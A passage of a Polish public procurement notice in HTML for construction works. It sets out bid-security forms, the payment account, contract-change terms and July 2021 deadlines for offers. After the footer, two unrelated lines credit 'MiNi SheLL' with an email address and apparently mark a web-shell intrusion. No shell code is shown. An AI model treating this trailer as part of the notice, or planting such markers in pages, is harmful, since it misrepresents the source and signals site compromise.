2 i 3 oraz ust. 2 PZP. <br/>3. Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach: <br/>1) pieniądzu; <br/>2) gwarancjach bankowych; <br/>3) gwarancjach ubezpieczeniowych; <br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z 9.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz.U. z 2019 r. poz. 310 ze zm.).<br/>4. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy zamawiającego: 12 9370 1033 0200 0475 2002 0010 z adnotacją: „Wadium – Nr sprawy: GP.271.5.2021”. W przypadku wnoszenia wadium w pieniądzu, Zamawiający uzna je za wniesione skutecznie jedynie w przypadku wpływu pieniędzy na rachunek bankowy Zamawiającego przed upływem terminu składania ofert.<br/>5. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w ust. 3 pkt 2–4, wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>6. Z treści gwarancji (poręczenia) musi jednoznacznie wynikać nieodwoływalne i bezwarunkowe, na każde żądanie zgłoszone przez zamawiającego, zobowiązanie gwaranta (poręczyciela) do zapłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 98 ust. 6 PZP. Ponadto powinien być wskazany termin obowiązywania gwarancji (poręczenia), który nie może być krótszy niż termin związania ofertą. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmian postanowień Umowy w stosunku do treści Oferty,<br/>napodstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej<br/>zokoliczności wymienionych w § 17 (Zmiana Umowy) załącznika nr 8 do SWZ -<br/>PROJEKTUMOWY <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-16 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Za pośrednictwem "Formularza do złożenia, zmiany, wycofaniaofertylub wniosku" dostępnego na ePUAP (Elektroniczna Skrzynka Podawcza), udostępnionegorównież na miniPortal</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-16 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-01 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com